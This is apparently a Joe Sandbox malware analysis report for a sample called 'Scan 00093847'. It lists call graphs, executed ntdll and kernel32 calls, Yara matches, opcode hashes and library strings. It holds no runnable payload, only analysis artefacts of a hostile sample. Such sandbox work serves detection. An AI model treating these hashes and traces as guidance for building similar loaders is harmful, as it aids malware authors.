76744 42e209 76743->76744 76755 4074c3 76744->76755 76746 42e21f 76754 401b49 76746->76754 76758 41b093 76746->76758 76748 42e23e 76751 42e253 76748->76751 76773 42c943 76748->76773 76769 428243 76751->76769 76752 42e26d 76753 42c943 ExitProcess 76752->76753 76753->76754 76776 4163f3 76755->76776 76757 4074d0 76757->76746 76759 41b0bf 76758->76759 76794 41af83 76759->76794 76762 41b104 76765 41b120 76762->76765 76767 42c593 NtClose 76762->76767 76763 41b0ec 76764 41b0f7 76763->76764 76766 42c593 NtClose 76763->76766 76764->76748 76765->76748 76766->76764 76768 41b116 76767->76768 76768->76748 76770 4282a5 76769->76770 76772 4282b2 76770->76772 76805 418593 76770->76805 76772->76752 76774 42c960 76773->76774 76775 42c971 ExitProcess 76774->76775 76775->76751 76777 416410 76776->76777 76779 416429 76777->76779 76780 42cfd3 76777->76780 76779->76757 76782 42cfed 76780->76782 76781 42d01c 76781->76779 76782->76781 76787 42bbc3 76782->76787 76785 42e633 RtlFreeHeap 76786 42d08f 76785->76786 76786->76779 76788 42bbe0 76787->76788 76791 10c2c0a 76788->76791 76789 42bc0c 76789->76785 76792 10c2c1f LdrInitializeThunk 76791->76792 76793 10c2c11 76791->76793 76792->76789 76793->76789 76795 41af9d 76794->76795 76799 41b079 76794->76799 76800 42bc63 76795->76800 76798 42c593 NtClose 76798->76799 76799->76762 76799->76763 76801 42bc80 76800->76801 76804 10c35c0 LdrInitializeThunk 76801->76804 76802 41b06d 76802->76798 76804->76802 76807 41859c 76805->76807 76806 418abb 76806->76772 76807->76806 76813 413c13 76807->76813 76809 4186e4 76809->76806 76810 42e633 RtlFreeHeap 76809->76810 76811 4186fc 76810->76811 76811->76806 76812 42c943 ExitProcess 76811->76812 76812->76806 76817 413c33 76813->76817 76815 413c9c 76815->76809 76816 413c92 76816->76809 76817->76815 76818 41b3a3 RtlFreeHeap LdrInitializeThunk 76817->76818 76818->76816 76819 10c2b60 LdrInitializeThunk 76820 42bb73 76821 42bb90 76820->76821 76824 10c2df0 LdrInitializeThunk 76821->76824 76822 42bbb8 76824->76822 76825 428933 76826 428998 76825->76826 76827 4289d3 76826->76827 76830 418ad3 76826->76830 76829 4289b5 76831 418ae7 76830->76831 76832 418a92 76830->76832 76831->76829 76833 42c943 ExitProcess 76832->76833 76834 418abb 76833->76834 76834->76829 76835 424cf3 76840 424d0c 76835->76840 76836 424d9c 76837 424d54 76838 42e633 RtlFreeHeap 76837->76838 76839 424d64 76838->76839 76840->76836 76840->76837 76841 424d97 76840->76841 76842 42e633 RtlFreeHeap 76841->76842 76842->76836 76843 42f7f3 76844 42f803 76843->76844 76845 42f809 76843->76845 76846 42e713 RtlAllocateHeap 76845->76846 76847 42f82f 76846->76847 76848 428b93 76849 428bf7 76848->76849 76850 428c2e 76849->76850 76853 4243a3 76849->76853 76852 428c10 76854 4243a5 76853->76854 76855 4244a4 76854->76855 76856 424533 76854->76856 76857 424548 76854->76857 76855->76852 76858 42c593 NtClose 76856->76858 76859 42c593 NtClose 76857->76859 76860 42453c 76858->76860 76862 424551 76859->76862 76860->76852 76861 424588 76861->76852 76862->76861 76863 42e633 RtlFreeHeap 76862->76863 76864 42457c 76863->76864 76864->76852 76865 418cd8 76866 42c593 NtClose 76865->76866 76867 418ce2 76866->76867

                                            Executed Functions

                                            Function 00417733 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 197 417733-41774f 198 417757-41775c 197->198 199 417752 call 42f333 197->199 200 417762-417770 call 42f933 198->200 201 41775e-417761 198->201 199->198 204 417780-417791 call 42dcb3 200->204 205 417772-41777d call 42fbd3 200->205 210 417793-4177a7 LdrLoadDll 204->210 211 4177aa-4177ad 204->211 205->204 210->211
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                            • Instruction ID: 8e2604fe3315099ce7e6592766d58e4e85df4a541fcdf6f6d68356c2e9832f5c
                                            • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                            • Instruction Fuzzy Hash: CE0152B5E4020DA7DB10DBA1DC42FDEB3789B54308F4081A6E91897281F635EB488B95
                                            Function 0042C593 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 238 42c593-42c5cc call 404773 call 42d7c3 NtClose
                                            APIs
                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C5C7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction ID: 4730e45dc8a455a10bbaf9a925c332d30bf1f4e4369036d8bfc9a482ac9e8ca9
                                            • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction Fuzzy Hash: 30E046766102147BD220BB6ADC41F9B77ACEFC5B14F40441AFA18A7281C676BA1087A8
                                            Function 010C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                            • Instruction ID: 510a34855ed59ad2da894fcede28a886b3038c54b0ce0beeaaf4a74f38f17945
                                            • Opcode Fuzzy Hash: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                            • Instruction Fuzzy Hash: 7290023560561402E100715C8514706101597D0201F65C412E0824568DC7958A5166A3
                                            Function 010C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 252 10c2b60-10c2b6c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                            • Instruction ID: 9f5ff3559bc62bf12fa0474e16ba2f0976d70ae8b59dd015d69280f4fee66b9d
                                            • Opcode Fuzzy Hash: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                            • Instruction Fuzzy Hash: 58900265202510035105715C8414616401A97E0201B55C022E1414590DC52589916226
                                            Function 010C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 254 10c2df0-10c2dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                            • Instruction ID: acf2c8d1e2d96960b681eea5ca5cacdb14cebf6deb33b413c6205ea3aba0a92b
                                            • Opcode Fuzzy Hash: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                            • Instruction Fuzzy Hash: CD90023520151413E111715C8504707001997D0241F95C413E0824558DD6568A52A222
                                            Function 010C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 253 10c2c70-10c2c7c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                            • Instruction ID: 740b2f1bc921d13924461fa47c7379b5b344ed7290895cd18083d1d339512281
                                            • Opcode Fuzzy Hash: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                            • Instruction Fuzzy Hash: FB90023520159802E110715CC40474A001597D0301F59C412E4824658DC69589917222
                                            Function 00413E32 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 413e32-413e3b 1 413ea2-413ebf 0->1 2 413e3d-413e40 0->2 3 413ec1-413ec8 1->3 4 413f1a-413f21 1->4 5 413e12-413e17 2->5 6 413e42-413e51 2->6 7 413eca-413ecc 3->7 8 413f3d-413f42 3->8 9 413f25 4->9 5->0 6->0 10 413e53-413e79 6->10 11 413ecd-413ed4 7->11 14 413f60-413f71 8->14 15 413f44-413f5e 8->15 12 413fa4-413fe2 call 42e6d3 call 42f0e3 call 417733 call 4046e3 9->12 13 413f27 9->13 16 413e7b-413e9f 10->16 17 413ede 10->17 11->9 19 413ed6-413eda 11->19 22 413fe6-41400d call 424e13 12->22 13->11 20 413f2a-413f3b 13->20 21 413f73-413f7a 14->21 14->22 15->14 16->1 19->17 20->8 21->12 31 41402d-414033 22->31 32 41400f-41401e PostThreadMessageW 22->32 32->31 34 414020-41402a 32->34 34->31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 3h8t0-08$3h8t0-08$a~V
                                            • API String ID: 0-2215303234
                                            • Opcode ID: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                                            • Instruction ID: 5f72fba8100ebba8870b20796ede5c15298c30b13232037c41d5cf2924e7c9ec
                                            • Opcode Fuzzy Hash: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                                            • Instruction Fuzzy Hash: EC510232D482996FCB12CF708CC2DDEBFB9DE42345B4840ADE4446B242D6298E07C7D5
                                            Function 00413FA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: 3h8t0-08$3h8t0-08
                                            • API String ID: 1836367815-1947605396
                                            • Opcode ID: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                                            • Instruction ID: e1e66dc98035f04d2431884f0e0db6d51c4b26c5f5f1261c7f2f59727122a13f
                                            • Opcode Fuzzy Hash: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                                            • Instruction Fuzzy Hash: 600104B1D0021C7AEB11AAE29C81DEF7B7CDF80398F408069FA04A7241D6784E068BB5
                                            Function 00413F9F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 51 413f9f-41401e PostThreadMessageW 53 414020-41402a 51->53 54 41402d-414033 51->54 53->54
                                            APIs
                                            • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: 3h8t0-08$3h8t0-08
                                            • API String ID: 1836367815-1947605396
                                            • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                                            • Instruction ID: 1603f725fde6bf5af95b6af14f59adfb275f0ca4856cf2d9dab87d41540ea272
                                            • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                                            • Instruction Fuzzy Hash: D6D0A732A4510865831355E56C41CFE7F7CD9C6755B0001A7EE04C4140F609491716E2
                                            Function 00417726 Relevance: 1.5, APIs: 1, Instructions: 37libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 212 417726-41772e 213 417730-41775c call 42f333 212->213 214 417793-4177a7 LdrLoadDll 212->214 218 417762-417770 call 42f933 213->218 219 41775e-417761 213->219 216 4177aa-4177ad 214->216 222 417780-417791 call 42dcb3 218->222 223 417772-41777d call 42fbd3 218->223 222->214 222->216 223->222
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                                            • Instruction ID: 9cb1692463f57b7dfc76d45307d73cb454a5d3a2701c0a14866b4d9e4b00da90
                                            • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                                            • Instruction Fuzzy Hash: 7CF0B475E4410DABDF10DAD4D881FDDB7B5EB54318F00C2E6ED1C9B280E531EA498B90
                                            Function 0042C8F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 233 42c8f3-42c934 call 404773 call 42d7c3 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,00416FB5,000000F4), ref: 0042C92F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                                            • Instruction ID: 7b60794ad80a06acb647eca91f5e56653821d3cfb1d91a0d0caff21413609de5
                                            • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                                            • Instruction Fuzzy Hash: 3BE06DB22042047BD610EF59EC41EDB77ACDFC5710F00441AF908A7281DB75B9108BB8
                                            Function 0042C8A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 228 42c8a3-42c8e7 call 404773 call 42d7c3 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(?,0041E52E,?,?,00000000,?,0041E52E,?,?,?), ref: 0042C8E2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction ID: 75f7dc53d552a5dc80399bc2a89f24ad6a6ecd643c57ce83a987320a35da5cda
                                            • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction Fuzzy Hash: 95E06DB12042047BD610EF69EC41EAB37ACDFC5710F004419FE08A7242D770B9148AB9
                                            Function 0042C943 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 243 42c943-42c97f call 404773 call 42d7c3 ExitProcess
                                            APIs
                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,7D282D94,?,?,7D282D94), ref: 0042C97A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 52f014dffe07f1b75dafc72ee9e052d85fafd1d86f3f1a40ae16dcff4a33ecd6
                                            • Instruction ID: 682fffa712135dc736fe9070f12072bcd6a9e54f8752c83740501f4c0056a1d0
                                            • Opcode Fuzzy Hash: 52f014dffe07f1b75dafc72ee9e052d85fafd1d86f3f1a40ae16dcff4a33ecd6
                                            • Instruction Fuzzy Hash: BEE046766402147BD620AB6AEC42F9B776CDFC5714F40841AFA08A7241CA74BA0587B8
                                            Function 010C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 248 10c2c0a-10c2c0f 249 10c2c1f-10c2c26 LdrInitializeThunk 248->249 250 10c2c11-10c2c18 248->250
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
                                            • Instruction ID: ae3ab1fd66be5613d839faeca7cf93f8b18163841a34fc5aa7a8d6639754f940
                                            • Opcode Fuzzy Hash: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
                                            • Instruction Fuzzy Hash: 39B09B719015D5C5EA51E764860871F795077D0701F15C066D2430681F4738C1D1E676

                                            Non-executed Functions

                                            Function 01102349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
                                            • Instruction ID: c77e0dfccfafb32eb9b63c236c0e26d5960a31b87dd57a11026ca82eafeca47e
                                            • Opcode Fuzzy Hash: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
                                            • Instruction Fuzzy Hash: A5929371A047429FE72ADF14C884FABB7E8BB84754F04492DFA95D7290D7B0D844CB92
                                            Function 011312ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            • Opcode ID: 3b1c99970eccbd3e340412f90f35741df8a3a71f5776e86853c43934950aa364
                                            • Instruction ID: ca47a43c57d0e1f9fa254234c834312594b885e78495fbd3c3e5b94a96a60456
                                            • Opcode Fuzzy Hash: 3b1c99970eccbd3e340412f90f35741df8a3a71f5776e86853c43934950aa364
                                            • Instruction Fuzzy Hash: DA12DE30604642EFEB2ACF69C440BB6BBF1FF8A714F198459E4D68B685D734E881CB51
                                            Function 0107D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                            • API String ID: 0-3532704233
                                            • Opcode ID: c7ae6feefe0ffb81d6ee0e3e5ad90c1ef2cdfef574cd041e60e79002ad660cc0
                                            • Instruction ID: 139e671b1fcb39c63a8208c36cbc07897b8779afa3cc7ea0d7b7b8e3ca863957
                                            • Opcode Fuzzy Hash: c7ae6feefe0ffb81d6ee0e3e5ad90c1ef2cdfef574cd041e60e79002ad660cc0
                                            • Instruction Fuzzy Hash: 42B1AC729083429FD761DF68C880AAFBBE8BF88754F05496EF9C9D7240D730D9448B96
                                            Function 01119179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                            • API String ID: 0-3063724069
                                            • Opcode ID: 3449ab32ad6ebdc53deacb4733a99e0c9a6fa16f8bc585d6fa25abae24be84eb
                                            • Instruction ID: 2654e376ef2847bf3725773346084e4a03390b5fb8999959d12221051cd300f4
                                            • Opcode Fuzzy Hash: 3449ab32ad6ebdc53deacb4733a99e0c9a6fa16f8bc585d6fa25abae24be84eb
                                            • Instruction Fuzzy Hash: 9BD1E5B280831AAFD725DB54C850BAFFBE8AF94B18F44493DFA9497150D770D904CBA2
                                            Function 01130274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
                                            • Instruction ID: 494d5db2ffc24d4e2d7a81991c1df92dd9c0bb7714e893555f7f091897574f1f
                                            • Opcode Fuzzy Hash: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
                                            • Instruction Fuzzy Hash: 6ED1EF31A00686DFDB2ADF68C840AAEFBF1FF8A710F198059F4959B656C7349981CB14
                                            Function 0107D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0107D2C3
                                            • @, xrefs: 0107D0FD
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0107D262
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0107D146
                                            • @, xrefs: 0107D313
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0107D196
                                            • @, xrefs: 0107D2AF
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0107D0CF
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            • API String ID: 0-1356375266
                                            • Opcode ID: 9bdd56a4011f399138fa0119dc5f27fddd45e28024f0d581cd184d9a1b4ec23c
                                            • Instruction ID: c634f93b3012dba8855e935baebdb94b57d613d98c873a1730546ead05ddea8c
                                            • Opcode Fuzzy Hash: 9bdd56a4011f399138fa0119dc5f27fddd45e28024f0d581cd184d9a1b4ec23c
                                            • Instruction Fuzzy Hash: 1CA158719083469FE761DF64C880B9FBBE8BF84725F00492EEAC896240E774D949CF56
                                            Function 0107F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
